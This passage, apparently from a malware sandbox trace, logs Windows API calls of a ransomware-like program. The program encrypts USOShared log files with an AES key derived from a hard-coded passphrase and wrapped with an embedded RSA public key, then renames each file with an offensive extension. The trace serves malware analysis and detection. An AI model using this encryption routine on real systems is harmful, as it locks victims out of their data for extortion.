szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f37b8) returned 1 [0241.261] CryptImportPublicKeyInfo (in: hCryptProv=0x28f37b8, dwCertEncodingType=0x1, pInfo=0x2907be8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907c18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907c20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7c78) returned 1 [0241.261] CryptEncrypt (in: hKey=0x28e7c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.261] CryptEncrypt (in: hKey=0x28e7c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3b70*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3b70*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.261] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3b70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3b70*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.262] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.262] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.262] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.262] CloseHandle (hObject=0xffffffff) returned 1 [0241.262] CloseHandle (hObject=0x5d10) returned 1 [0241.263] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl"), bFailIfExists=0) returned 0 [0241.271] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl", dwFileAttributes=0x2000) returned 0 [0241.271] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl.gsg")) returned 1 [0241.278] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl.fuck")) returned 0 [0241.279] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.279] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.279] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.279] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.279] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.279] GetLastError () returned 0x5 [0241.279] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl")) returned 0x2020 [0241.279] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl", dwFileAttributes=0x80) returned 0 [0241.280] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.280] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.281] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.282] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.284] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.284] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.284] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.284] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.285] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.285] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.285] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3840) returned 1 [0241.285] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3840, dwCertEncodingType=0x1, pInfo=0x2907d88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907db8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907dc0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7d38) returned 1 [0241.285] CryptEncrypt (in: hKey=0x28e7d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.285] CryptEncrypt (in: hKey=0x28e7d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3d08*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3d08*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.285] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3d08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d08*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.286] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.286] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.287] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.287] CloseHandle (hObject=0xffffffff) returned 1 [0241.287] CloseHandle (hObject=0x5d10) returned 1 [0241.292] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl"), bFailIfExists=0) returned 0 [0241.311] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl", dwFileAttributes=0x2000) returned 0 [0241.311] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl.gsg")) returned 1 [0241.313] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl.fuck")) returned 0 [0241.314] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.314] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.314] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.314] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.314] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.314] GetLastError () returned 0x5 [0241.314] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl")) returned 0x2020 [0241.314] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl", dwFileAttributes=0x80) returned 0 [0241.315] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.315] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.316] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.317] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.336] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.336] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.336] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.336] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.336] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.336] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f38c8) returned 1 [0241.337] CryptImportPublicKeyInfo (in: hCryptProv=0x28f38c8, dwCertEncodingType=0x1, pInfo=0x2907e58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907e88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907e90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7f78) returned 1 [0241.337] CryptEncrypt (in: hKey=0x28e7f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.337] CryptEncrypt (in: hKey=0x28e7f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2d18*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f2d18*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.337] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f2d18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f2d18*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.340] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.340] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.340] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.340] CloseHandle (hObject=0xffffffff) returned 1 [0241.340] CloseHandle (hObject=0x5d10) returned 1 [0241.343] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl"), bFailIfExists=0) returned 0 [0241.351] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl", dwFileAttributes=0x2000) returned 0 [0241.352] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl.gsg")) returned 1 [0241.353] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl.fuck")) returned 0 [0241.354] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.354] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.354] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.354] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.354] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.354] GetLastError () returned 0x5 [0241.354] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl")) returned 0x2020 [0241.354] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl", dwFileAttributes=0x80) returned 0 [0241.355] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.355] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.356] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.356] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.359] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.359] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.359] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.359] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.359] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.359] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.359] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3950) returned 1 [0241.359] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3950, dwCertEncodingType=0x1, pInfo=0x2906528*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906558*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906560*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7ff8) returned 1 [0241.359] CryptEncrypt (in: hKey=0x28e7ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.360] CryptEncrypt (in: hKey=0x28e7ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f39d8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f39d8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.360] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f39d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f39d8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.361] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.361] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.361] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.361] CloseHandle (hObject=0xffffffff) returned 1 [0241.361] CloseHandle (hObject=0x5d10) returned 1 [0241.363] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl"), bFailIfExists=0) returned 0 [0241.370] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl", dwFileAttributes=0x2000) returned 0 [0241.371] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl.gsg")) returned 1 [0241.372] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl.fuck")) returned 0 [0241.373] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.373] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.373] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.373] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.373] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.373] GetLastError () returned 0x5 [0241.374] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl")) returned 0x2020 [0241.375] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl", dwFileAttributes=0x80) returned 0 [0241.376] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.376] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.377] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.378] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.380] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.380] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.380] CryptHashData (hHash=0x28e8578, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.380] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.380] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 